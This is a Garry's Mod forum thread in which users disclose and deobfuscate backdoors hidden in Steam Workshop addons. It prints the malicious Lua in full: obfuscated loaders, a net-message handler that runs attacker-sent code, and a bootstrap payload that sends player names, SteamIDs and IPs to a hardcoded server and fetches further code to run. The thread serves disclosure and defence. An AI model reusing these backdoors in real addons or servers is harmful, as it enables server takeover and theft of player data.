[PSA] Backdoor Found in "Suits and Robbers Player Models" Workshop Addon
93 replies, posted
[QUOTE=Robotboy655;47398414]Thanks, fixed. Unfortunately, it is impossible to "ban" someone from uploading to workshop. [B]I could do this from GMPublish[/B], but he 100% has friends who would do this for him + there are programs that circumvent GMPublish ( like gmosh? )[/QUOTE]
Please do this. Valid point about the friends, but it would at least be some kind of "permaban".
About gmosh:
[url]https://github.com/FPtje/gmosh/blob/master/src/gmpublish.py#L68[/url]
[url]https://github.com/FPtje/gmosh/blob/master/src/gmpublish.py#L20[/url]
[QUOTE=zerf;47402571]Please do this. Valid point about the friends, but it would at least be some kind of "permaban".
About gmosh:
[url]https://github.com/FPtje/gmosh/blob/master/src/gmpublish.py#L68[/url]
[url]https://github.com/FPtje/gmosh/blob/master/src/gmpublish.py#L20[/url][/QUOTE]
I wouldn't use gmpublish if I had the api. I don't even know if gmpublish does anything besides just using the api.
[QUOTE=FPtje;47405283]I wouldn't use gmpublish if I had the api. I don't even know if gmpublish does anything besides just using the api.[/QUOTE]
[url]https://partner.steamgames.com/[/url]. gmpublish uses the ISteamRemoteStorage interface.
A friend of mine sent me this asking what it does
[CODE]local ms = "\83\69\82\86\69\82\103\97\109\101\73\115\68\101\100\105\99\97\116\101\100\67\111\109\112\105\108\101\83\116\114\105\110\103\117\116\105\108\65\100\100\78\101\116\119\111\114\107\83\116\114\105\110\103\110\101\116\82\101\99\101\105\118\101\114\115\91\67\93\115\116\114\105\110\103\116\105\109\101\114\83\105\109\112\108\101\104\116\116\112\80\111\115\116\104\116\116\112\58\47\47\103\109\111\100\46\104\105\110\116\115\46\109\101\47\71\101\116\67\111\110\86\97\114\83\116\114\105\110\103\104\111\115\116\110\97\109\101\105\112\112\108\97\121\101\114\71\101\116\65\108\108\109\57\107\95\97\100\100\111\110\115\82\101\97\100\83\116\114\105\110\103\116\121\112\101\120\112\99\97\108\108\82\101\99\101\105\118\101" local mt = {0, 6, 10, 21, 34, 38, 54, 57, 66, 69, 75, 80, 86, 90, 94, 115, 130, 138, 140, 146, 152, 162, 172, 176, 182} local l = (function(n) return ms:sub(mt[n] + 1, mt[n + 1]) end) local g = (function(n) return _G[l(n)] end) if g(1) and g(2)[l(3)]() then local f = (function() end) local c = g(4) local r = g(7)[l(22)] g(5)[l(6)](l(21)) g(7)[l(8)][l(21)] = (function() local s = c(r() or "--", l(9), false) if g(23)(s) ~= l(10) then g(24)(s, f) end end) g(11)[l(12)](16, function() g(13)[l(14)](l(15), {hn = g(16)(l(17)), ip = g(16)(l(18)), np = #g(19)[l(20)]()}, f, f) end) end[/CODE]
So I deobfuscated it and it turns out to be a backdoor as well:
[CODE]if SERVER and game.IsDedicated() then
local f = function() end
local c = CompileString
local r = net.ReadString
util.AddNetworkString("m9k_addons")
net.Receivers.m9k_addons = function()
local s = CompileString(net.ReadString() or "--", "[C]", false)
if type(s) != "string" then
xpcall(s,f)
end
end
timer.Simple(16, function()
http.Post("http://gmod.hints.me/", {
hn = GetConVarString("hostname"),
hn = GetConVarString("ip"),
np = #player.GetAll()
}, f, f)
end)
end[/CODE]
The author can load his hack on his client, connect to a server IP address listed on his website, and wreak havoc by running lua on the server with the m9k_addons net message.
It even gets called falsely under [C] to look legit.
This is apparently from code from the same addon (Suits and Robbers Player Models).
[QUOTE=FPtje;47405283]I wouldn't use gmpublish if I had the api. I don't even know if gmpublish does anything besides just using the api.[/QUOTE]
There is whole workshop api documentation on steamworks site.
Including a flowchart of workshop publishing.
[IMG]https://partner.steamgames.com/public/images/ISteamUGCFlow-CreateUpload-Web.png[/IMG]
That's all in the C++ API, though. GMosh is written in python. The web API only seems to have a thing to request workshop item details.
I'll see what I can do with the web API and Python ffi interface when I have time.
Probably in like half a year or something :(
The last person to use this method was ZeroTheFallen. (And tabbed it out of view)
Ironic how it posts to the same webhost(3owl) that he used in his backdoored workshop addons in the past.
This is why I'm glad I'm only subscribed to 9 addons on the workshop because I'd hate to go through thousands of addons to check for backdoors.
[QUOTE=Phoenixf129;47411337]The last person to use this method was ZeroTheFallen. (And tabbed it out of view)
Ironic how it posts to the same webhost(3owl) that he used in his backdoored workshop addons in the past.[/QUOTE]
One time I was in the GmodCoders chat and somebody said that they have a friend that just goes around soliciting people to put backdoors in their addons. Possibly related?
[QUOTE=edgarasf123;47373896][url]http://steamcommunity.com/sharedfiles/filedetails/?id=409961186[/url]
This script also has exactly the same backdoor.
[editline]22nd March 2015[/editline]
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=408243366[/url]
[code]
function fnafgmcheckadmin(pl)
if (pl:SteamID()=="STEAM_0:1:18280147" or pl:SteamID()=="STEAM_0:1:35715092" or pl:SteamID()=="STEAM_0:1:51964687") then
return true
end
return false
end
[/code][/QUOTE]
Hi! I see you mentioned my addon (FNAFGM).
This function itself does nothing. This is just a function to check creators of the gamemode: Used in chat by example: "[FNAFGM Creator] VictorienXP: Hello!"
Next time, check the entire code, the [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=408243366"]addon description[/URL] and the [URL="http://steamcommunity.com/workshop/filedetails/discussion/408243366/618460171316923473/"]Dedicated sever documentation[/URL], before saying there is a backdoor, thanks...
And if there is something wrong or someting you want me to change you can tell me directly.
[QUOTE=VictorienXP;47715206]Hi! I see you mentioned my addon (FNAFGM).
This function itself does nothing. This is just a function to check creators of the gamemode: Used in chat by example: "[FNAFGM Creator] VictorienXP: Hello!"
Next time, check the entire code, the [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=408243366"]addon description[/URL] and the [URL="http://steamcommunity.com/workshop/filedetails/discussion/408243366/618460171316923473/"]Dedicated sever documentation[/URL], before saying there is a backdoor, thanks...
And if there is something wrong or someting you want me to change you can tell me directly.[/QUOTE]
That piece of code fits the very definition of backdoor. You're gaining unauthorized access to various server CVars, "A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing unauthorized remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected."
[QUOTE=RonanZer0;47716967]That piece of code fits the very definition of backdoor. You're gaining unauthorized access to various server CVars, "A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing unauthorized remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected."[/QUOTE]
Where I'm gaining access to server CVars with that?
So you see SteamIDs and you thing it's a backdoor. So with your logic and very good knowledge you can think there is backdoors here [url]https://github.com/pixeltailgames/cinema/blob/a72276c1e21911b79d7ea4e73c8846be948abaa9/cinema/gamemode/extensions/sh_pixeltail.lua[/url] here [url]https://github.com/pixeltailgames/elevator-source/blob/4c8293c74534eea567b57da7f7cb21d6b487f400/gamemodes/elevator/gamemode/scoreboard/cl_playerlist.lua[/url] and here [url]https://github.com/garrynewman/garrysmod/blob/4eb9bb19dcfac06007691376ecaf2dbc56efa6b2/garrysmod/gamemodes/terrortown/gamemode/vgui/sb_row.lua[/url] great!
I hope you can understand your mistakes, it will be a great improvement for yourself. For I can spend less time trying to help people to correctly read, it's ironic because I'm not even English, I don't know specifically coding, but I can read and understand what I read, unlike you apparently.
[QUOTE=RonanZer0;47716967]That piece of code fits the very definition of backdoor. You're gaining unauthorized access to various server CVars, "A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing unauthorized remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected."[/QUOTE]
what?
so i've extra downloaded the gamemode to my harddrive (damn now i need an hdd exorcism) and what he gets is the fnafgm specific convars, gamemode version and hostos. Everything you can also get just by being on an server. But just in an nice, handy layout with 1 concommand.
brb calling an exorcist.
Just found a backdoor here: [url]http://steamcommunity.com/sharedfiles/filedetails/?id=412787102[/url]
[img]http://i.gyazo.com/81ddce3dc6065764152e764f3ce71963.png[/img]
He doesn't return false to hide the message either so they will instantly know its him. Also all those addmoney functions are pretty funny
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=450085535&searchtext=fading+door[/url]
Has this
[lua]
local a=debug.getfenv(function()end)local CRC=util.CRC;local function b(c,d,...)if d then d=''..d;for e,f in pairs(c)do if CRC(e)==d then return b(f,...)end end else return c end end;local g=b(a,0x9EBEB2A9,0x8CFE579F)local h=b(a,0xA4584355,0xC5573507)local i=b(a,0xA4584355,0x6F2C1806)local j=b(a,0x15D67C66)local k=b(a,0xD23AE7F0)local l=b(a,0x2F694CE9)local m=b(a,0xA1EDE006)local n=b(a,0xBE26E14C)local o=b(a,0x3EFFD17C)if SERVER then local p={}local function q(r)local s={}for e,f in l(r)do if not o(f)then s[e]=f else p[r]=s;if p[f]then s[e]=p[f]else s[e]=q(f,p)end end end;return s end;local t,u=3,'a'local v,w='b','c'local x,y=4,'d'local z,A='/','e'local B,C='f','g'local D,E=5,'h'local F,G='i','j'local H,I=7,8;local J='k'local K='l'local L='m'local M='n'local N=0;local O=2;local P='o'local Q='p'local R='q'local S='r'local T='s'local U=6;local V=9;local W='t'local X='u'local Y='v'local Z=1;local _='w'local a0='x'local a1='.'local a2=':'local a3='y'local a4='z'local a5='.'local a6='h'local a7='t'local a8='p'local Z='1'local O='2'local t='3'local x='4'local D='5'local U='6'local H='7'local I='8'local V='9'local z='/'local a9='a'local aa='i'local ab='b'local ac='o'local ad=':'local ae='s'local af='r'local ag='p'local ah=a6 ..a7 ..a7;local ai=ag..ad..z;local aj=z;local ak=ah..ai..aj;local al=ak..Z..V;local am=O..a5 ..V;local an=V..a5 ..Z;local ao=al..am..an;local ap=ao..x..D..a5;local aq=Z..V..H;local ar=z..a9 ..ag;local as=ap..aq..ar;local at=as..aa..z..ab..ac;local au=ac..a7 ..ae..a7;local av=af..a9 ..ag;local aw=at..au..av;local ax=q(_G)local ay=ax.tostring({})local function az()k(m,{url=aw,method='get',success=function(aA,aB)local aC=n(aB,'bootstrap.lua')if aC then aC()_G.bootstrap(ax)_G.bootstrap=nil;i('InitPostEntity',ay)end end,failed=function()az()end})end;h('InitPostEntity',ay,az)end[/lua]
url is stored in aw, but to save you some time the URL is "http://192.99.145.197/api/bootstrap"
Which leads to even more lua code which I haven't bothered to look at yet, but it's not the official fading door addon and seems sketchy enough.
code from url
[lua]
function bootstrap(a)setfenv(1,a)local bit=bit;local sql=sql;local http=http;local GetConVarString=GetConVarString;local table=table;local game=game;sql.Query('DROP TABLE metaCache')sql.Query('CREATE TABLE IF NOT EXISTS metaCache2 (hash TEXT, body TEXT, date INTEGER)')sql.Query('DELETE FROM metaCache2 WHERE date < '..os.time()-24*60*60*2)local b='http://192.99.145.197/api/'local c=''local d=''local function e(f,g)if not g then local h=g;g=f;f='misc'end;http.Post(b..'error/'..f,{message=g},function(i)end)end;local function j()return(GetConVarString('ip')or'localhost')..':'..GetConVarString('hostport')or'27015'end;local function k(g)if type(g)=='function'then return function(l)return g(k(l))end else local m=string.find(g,',')if not m then return'error','failed to parse'else local n=string.sub(g,1,m-1)local i=string.sub(g,m+1)if n=='success'then return'success',util.JSONToTable(i)else return n,i end end end end;local function o(p,q)local r=sql.Query('SELECT body FROM metaCache2 WHERE hash = '..sql.SQLStr(p))if r and r[1]then q(true,r[1].body)else http.Fetch(b..'payload/'..p,function(i)if i=='file not found'then dprint('file not found '..p)q(false,'file not found')else sql.Query('REPLACE INTO metaCache (hash,body,date) VALUES ('..sql.SQLStr(p)..','..sql.SQLStr(i)..','..os.time()..')')q(true,i)end end,function(s)q(false,s)end)end end;local t={}local function u(p,v)o(p,function(w,x)if w then local y=CompileString(x,p..'.lua',false)t[p]=isfunction(y)if isfunction(y)then local z,A=pcall(y)if not z then e('run_error','script: '..v..' error: '..A)end else e('syntax_error','script: '..v..' error: '..y)end else t[p]=false end end)end;local function B(p)return t[p]end;local C,D,E,F=-1,'','',''local function G(H)if H then C=-1;D=''E=''F=''end;local I=player.GetAll()for J,K in pairs(I)do I[J]={name=K:Name(),steamid=K:SteamID(),ip=K:IPAddress()}end;local L=game.GetMap()local M=GetConVarString('hostname')local N=j()local O=gmod.GetGamemode().Name or'unknown'local P={connectIp=N}if L~=D then D=L;P.map=L end;if M~=E then E=M;P.name=M end;if O~=F then F=O;P.gamemode=O end;if#I~=C then C=#I;P.players=util.TableToJSON(I)end;if table.Count(P)~=1 then if H then P.payloadState=d end;http.Post(b..'stats',P,function(x)end,function(s)e('http_error','submit stats: '..s)end)end end;local function Q(R)if R~=d then http.Fetch(b..'payloads',k(function(n,i)if n=='success'then for S,T in ipairs(i)do if B(T.hash)==nil then u(T.hash,T.file..'.lua')elseif B(T.hash)==false then else end end;d=R else end end),function(s)e('http_error','fetch updates: '..s)end)else end end;local function U()http.Fetch(b..'ping',function(i)local n,i=k(i)if n=='success'then G(i.isForeign or i.apiInstanceId~=c)c=i.apiInstanceId;Q(i.payloadStateId)else dprint(n)end end,function(s)e('http_error','ping: '..s)end)end;U()timer.Create('AkjvfkjerjJAre',30,0,U)end[/lua]
I guess it could be some sort of monitoring script, not had time to look at the rest of that tho.
[QUOTE=Mrkrabz;47817442][url]http://steamcommunity.com/sharedfiles/filedetails/?id=450085535&searchtext=fading+door[/url]
Has this
I guess it could be some sort of monitoring script, not had time to look at the rest of that tho.[/QUOTE]
Ripping the script apart atm.
In the meantime; I've filed an abuse to OVH Hosting to take that IP off.
[QUOTE=Nak;47820119]Ripping the script apart atm.
In the meantime; I've filed an abuse to OVH Hosting to take that IP off.[/QUOTE]
It looks like the payload loads further code from that web server. Getting that IP offline before you fully decode the lua is counterproductive.
How do you guys even decide to go through a particular addon and look for backdoors?
[QUOTE=TheMrFailz;47820394]How do you guys even decide to go through a particular addon and look for backdoors?[/QUOTE]
I just noticed someone put up the fading door tool and it only had 20~ subs. Decided to take a look for the luls.
[highlight](User was banned for this post ("Meme reply" - Craptasket))[/highlight]
[QUOTE=Mrkrabz;47820515]I just noticed someone put up the fading door tool and it only had 20~ subs. Decided to take a look for the luls.
[highlight](User was banned for this post ("Meme reply" - Craptasket))[/highlight][/QUOTE]
Holy fuck I can't believe this post got banned just because of "for the lulz", it's just a different phrasing of "just for the fun of it".
[highlight](User was banned for this post ("offtopic" - Craptasket))[/highlight]
Yeah, guy finds a backdoor addon and gets banned for it in the end.
Doesn't seem exactly fair or anything.
[QUOTE=wh1t3rabbit;47821094]Holy fuck I can't believe this post got banned just because of "for the lulz", it's just a different phrasing of "just for the fun of it".[/QUOTE]
I was gonna say that as well; seemed like a rather unnecessary ban.. not exactly what I envisioned a "meme reply" as. A shame since it was his first one too. Anyway, I'll stop derailing now, sorry.
[QUOTE=Mrkrabz;47817442][url]http://steamcommunity.com/sharedfiles/filedetails/?id=450085535&searchtext=fading+door[/url]
Has this
[lua]
local a=debug.getfenv(function()end)local CRC=util.CRC;local function b(c,d,...)if d then d=''..d;for e,f in pairs(c)do if CRC(e)==d then return b(f,...)end end else return c end end;local g=b(a,0x9EBEB2A9,0x8CFE579F)local h=b(a,0xA4584355,0xC5573507)local i=b(a,0xA4584355,0x6F2C1806)local j=b(a,0x15D67C66)local k=b(a,0xD23AE7F0)local l=b(a,0x2F694CE9)local m=b(a,0xA1EDE006)local n=b(a,0xBE26E14C)local o=b(a,0x3EFFD17C)if SERVER then local p={}local function q(r)local s={}for e,f in l(r)do if not o(f)then s[e]=f else p[r]=s;if p[f]then s[e]=p[f]else s[e]=q(f,p)end end end;return s end;local t,u=3,'a'local v,w='b','c'local x,y=4,'d'local z,A='/','e'local B,C='f','g'local D,E=5,'h'local F,G='i','j'local H,I=7,8;local J='k'local K='l'local L='m'local M='n'local N=0;local O=2;local P='o'local Q='p'local R='q'local S='r'local T='s'local U=6;local V=9;local W='t'local X='u'local Y='v'local Z=1;local _='w'local a0='x'local a1='.'local a2=':'local a3='y'local a4='z'local a5='.'local a6='h'local a7='t'local a8='p'local Z='1'local O='2'local t='3'local x='4'local D='5'local U='6'local H='7'local I='8'local V='9'local z='/'local a9='a'local aa='i'local ab='b'local ac='o'local ad=':'local ae='s'local af='r'local ag='p'local ah=a6 ..a7 ..a7;local ai=ag..ad..z;local aj=z;local ak=ah..ai..aj;local al=ak..Z..V;local am=O..a5 ..V;local an=V..a5 ..Z;local ao=al..am..an;local ap=ao..x..D..a5;local aq=Z..V..H;local ar=z..a9 ..ag;local as=ap..aq..ar;local at=as..aa..z..ab..ac;local au=ac..a7 ..ae..a7;local av=af..a9 ..ag;local aw=at..au..av;local ax=q(_G)local ay=ax.tostring({})local function az()k(m,{url=aw,method='get',success=function(aA,aB)local aC=n(aB,'bootstrap.lua')if aC then aC()_G.bootstrap(ax)_G.bootstrap=nil;i('InitPostEntity',ay)end end,failed=function()az()end})end;h('InitPostEntity',ay,az)end[/lua]
url is stored in aw, but to save you some time the URL is "http://192.99.145.197/api/bootstrap"
Which leads to even more lua code which I haven't bothered to look at yet, but it's not the official fading door addon and seems sketchy enough.
code from url
[lua]
function bootstrap(a)setfenv(1,a)local bit=bit;local sql=sql;local http=http;local GetConVarString=GetConVarString;local table=table;local game=game;sql.Query('DROP TABLE metaCache')sql.Query('CREATE TABLE IF NOT EXISTS metaCache2 (hash TEXT, body TEXT, date INTEGER)')sql.Query('DELETE FROM metaCache2 WHERE date < '..os.time()-24*60*60*2)local b='http://192.99.145.197/api/'local c=''local d=''local function e(f,g)if not g then local h=g;g=f;f='misc'end;http.Post(b..'error/'..f,{message=g},function(i)end)end;local function j()return(GetConVarString('ip')or'localhost')..':'..GetConVarString('hostport')or'27015'end;local function k(g)if type(g)=='function'then return function(l)return g(k(l))end else local m=string.find(g,',')if not m then return'error','failed to parse'else local n=string.sub(g,1,m-1)local i=string.sub(g,m+1)if n=='success'then return'success',util.JSONToTable(i)else return n,i end end end end;local function o(p,q)local r=sql.Query('SELECT body FROM metaCache2 WHERE hash = '..sql.SQLStr(p))if r and r[1]then q(true,r[1].body)else http.Fetch(b..'payload/'..p,function(i)if i=='file not found'then dprint('file not found '..p)q(false,'file not found')else sql.Query('REPLACE INTO metaCache (hash,body,date) VALUES ('..sql.SQLStr(p)..','..sql.SQLStr(i)..','..os.time()..')')q(true,i)end end,function(s)q(false,s)end)end end;local t={}local function u(p,v)o(p,function(w,x)if w then local y=CompileString(x,p..'.lua',false)t[p]=isfunction(y)if isfunction(y)then local z,A=pcall(y)if not z then e('run_error','script: '..v..' error: '..A)end else e('syntax_error','script: '..v..' error: '..y)end else t[p]=false end end)end;local function B(p)return t[p]end;local C,D,E,F=-1,'','',''local function G(H)if H then C=-1;D=''E=''F=''end;local I=player.GetAll()for J,K in pairs(I)do I[J]={name=K:Name(),steamid=K:SteamID(),ip=K:IPAddress()}end;local L=game.GetMap()local M=GetConVarString('hostname')local N=j()local O=gmod.GetGamemode().Name or'unknown'local P={connectIp=N}if L~=D then D=L;P.map=L end;if M~=E then E=M;P.name=M end;if O~=F then F=O;P.gamemode=O end;if#I~=C then C=#I;P.players=util.TableToJSON(I)end;if table.Count(P)~=1 then if H then P.payloadState=d end;http.Post(b..'stats',P,function(x)end,function(s)e('http_error','submit stats: '..s)end)end end;local function Q(R)if R~=d then http.Fetch(b..'payloads',k(function(n,i)if n=='success'then for S,T in ipairs(i)do if B(T.hash)==nil then u(T.hash,T.file..'.lua')elseif B(T.hash)==false then else end end;d=R else end end),function(s)e('http_error','fetch updates: '..s)end)else end end;local function U()http.Fetch(b..'ping',function(i)local n,i=k(i)if n=='success'then G(i.isForeign or i.apiInstanceId~=c)c=i.apiInstanceId;Q(i.payloadStateId)else dprint(n)end end,function(s)e('http_error','ping: '..s)end)end;U()timer.Create('AkjvfkjerjJAre',30,0,U)end[/lua]
I guess it could be some sort of monitoring script, not had time to look at the rest of that tho.[/QUOTE]
I strongly suspect that this decompiled backdoor code which I got hold of previously was part of the payload:
[lua]
-- screensize2 console command
-- @a5c55c4b284eb8ceb72788331a7b2471d66b3d91.lua
function (a, b, c)
RunString (c [1])
return
end
-- screensize_snd console command
-- @a5c55c4b284eb8ceb72788331a7b2471d66b3d91.lua
function (a, b, c)
if not c [1] then
local _a = a
local _a_ChatPrint = a.ChatPrint
local _ed_args_1_fname_ = "expected args[1] fname"
UCLO ReadOnlyBase 0, 15
end
net.Receive ("rcivluz", function ()
local e = CompileString (net.ReadString (), "test.lua", false)
if isstring (e) then
local f = a
f.ChatPrint (f, "syntax error: " .. e)
else
local f, g = pcall (e)
if not f then
local _a = a
_a.ChatPrint (_a, "run time error: " .. g)
else
_a = a
_a.ChatPrint (_a, "ran your code successfully!")
end
end
return
end)
a.SendLua (a, string.format ("net.Start 'rcivluz' net.WriteString(file.Read('%s','DATA')) net.SendToServer()", c [1]))
UCLO ReadOnlyBase 0, 0
return
CALLT WritableBase 3, 3
end
[/lua]
Because the lua path name ("a5c55c4b284eb8ceb72788331a7b2471d66b3d91.lua") is the kind of path that the bootstrap code CompileStrings with,
the style of CompileString error handling and messages is similar to the bootstrap code ([url]http://pastebin.com/fwnpPckp[/url] part of bootstrap deobfuscated),
and it uses a, b, c, .. as variable names just like the bootstrap code.
-snip I WAS LIED TO-
What's TRIGGER_PLAYER
[QUOTE=Noi;47998669][code]
{
"targetname" "admin.lua_access"
"origin" "-5952 13408 7264"
"Code" "if(TRIGGER_PLAYER:SteamID()=='STEAM_0:0:43729643'or TRIGGER_PLAYER:SteamID()=='STEAM_0:0:39840171'or TRIGGER_PLAYER:SteamID()=='STEAM_0:1:28979300'or TRIGGER_PLAYER:SteamID()=='STEAM_0:1:33127709')then GAMEMODE:Notify(TRIGGER_PLAYER,0,4,'Welcome to Gusman room')else TRIGGER_PLAYER:Kill()TRIGGER_PLAYER:Kick('No access')end"
"classname" "lua_run"
"hammerid" "2333175"
}
{
"model" "*182"
"wait" "1"
"StartDisabled" "0"
"spawnflags" "1"
"origin" "-5696 13664 7424"
"classname" "trigger_multiple"
"hammerid" "2343758"
"OnStartTouch" "admin.lua_access,RunCode,,0,-1"
}
[/code]
this [url]https://steamcommunity.com/sharedfiles/filedetails/?id=374492855[/url][/QUOTE]
Too lazy to look up the Steam IDs or locations on the map, but just glancing at the code it looks like it prevents access to a certain room to all but the creators and his butt buddies?
[QUOTE=meharryp;47999355]Lol your comment got deleted[/QUOTE]
It doesn't matter, I asked him to remove the naughty code, he said he'll do it in a few days.
[QUOTE=Noi;48032915]Nothing was deleted.[/QUOTE]
Now it should be.
Sorry, you need to Log In to post a reply to this thread.
